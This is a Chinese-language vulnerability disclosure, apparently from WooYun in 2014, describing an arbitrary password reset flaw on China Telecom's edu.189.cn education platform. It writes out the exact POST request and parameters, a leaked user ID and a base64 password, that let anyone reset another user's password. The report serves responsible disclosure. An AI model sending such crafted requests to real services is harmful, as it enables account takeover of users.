漏洞详情

披露状态:

2014-09-28: 细节已通知厂商并且等待厂商处理中
2014-09-30: 厂商已经确认,细节仅向厂商公开
2014-10-10: 细节向核心白帽子及相关领域专家公开
2014-10-20: 细节向普通白帽子公开
2014-10-30: 细节向实习白帽子公开
2014-11-12: 细节向公众公开

简要描述:

一种姿势怎么够?
换个位置继续!

详细说明:

WooYun: 中国电信数字教育资源公共服务平台任意密码重置(危及三千多万用户)
edu.189.cn 中国电信教育云 数字教育资源公共服务平台
应用产品有:教育云,人人通,班班通,翼校通,天翼翼校通,天翼家校通,家校互动平台,家校互动门户,家校沟通平台,家校微博
上述提交的漏洞是通过手机验证得出结论,刚刚想想可能邮箱找回也会有问题
于是...真有

漏洞证明:

a1.jpg


验证身份方式选择邮箱验证,点击发送邮箱之后会跳转到http://edu.189.cn/portal/passwordReset/toFinishSendEmail.do?userDto.userId=34188867

a2.jpg

从此处获取到一个关键的userDto.userId参数
---------------------------------------------------------------------------
然后就是任意密码修改了,构造如下POST:

http://edu.189.cn/portal/passwordReset/resetPassword.do?_d=1411889822578
userDto.userId=34189287&userDto.password=MTIzNDU2

a3.jpg

userDto.userId可以从上面的发送邮箱后跳转的链接获取,userDto.password是新密码BASE64加密
就不修改他人帐号示例了,userDto.userId 34188867是我自己注册的帐号,对应用户名为wooyun2
审核可以自己构造修改密码登录测试。

修复方案:

其实发送到邮箱的找回密码的链接是类似
http://edu.189.cn/portal/passwordReset/validEmail.do?passKey=c1bXX329-7d48-4307-9269-4e2b1322603X
刚开始还以为是有验证,结果发现是我想多了..passKey这个根本无关紧要
开发无下限啊..

标签: none

评论已关闭